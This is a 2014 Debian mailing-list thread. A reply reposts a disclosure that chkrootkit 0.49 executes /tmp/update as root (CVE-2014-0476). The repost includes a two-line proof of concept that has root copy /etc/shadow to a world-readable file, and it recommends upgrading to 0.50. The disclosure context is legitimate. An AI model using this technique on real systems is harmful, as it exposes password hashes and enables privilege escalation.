Guess that is the matter: https://www.debian.org/security/2014/dsa-2945 --hh
Just reposting: Date: Thu, 05 Jun 2014 06:27:35 +0000 From: "mancha" <manc...@hush.com> To: slackbuilds-us...@slackbuilds.org Subject: [Slackbuilds-users] chkrootkit vulnerability Hi. As ironic as it sounds, chkrootkit 0.49 can be turned into a rootkit. On systems where /tmp is not mounted noexec, a regular user can create a file /tmp/update which chkrootkit will execute with root privileges each time it's run. Here's a simple PoC...as normal user: $ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update $ chmod 755 /tmp/update As root: # chkrootkit Now the user has access to the shadow password file (/tmp/stolen). Solution: Update to chkrootkit 0.50 --mancha ----------------- PGP: 0x25168EB24F0B22AC [56B7 100E F4D5 811C 8FEF ADD1 2516 8EB2 4F0B 22AC] Horatio Leragon <hlera...@yahoo.com> wrote (Wed, 4 Jun 2014 04:38:45 -0700 (PDT)): > I received a security update advisory [SECURITY] [DSA 2945-1] today. > > Package : chkrootkit > CVE ID : CVE-2014-0476 > > I am shocked to learn that Debian is vulnerable to rootkits. That's > why there's a package to check for them. > > I switched to Debian from Microsoft Windows OS because of the massive > over-hype that I read on the internet: that Debian is impervious to > malware and no viruses have ever infected a *nix OS. > > > Should I install this package called "chkrootkit"? > > But then it itself is vulnerable to errors in its code :( -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140605200357.29dcf...@bivalve.fritz.box
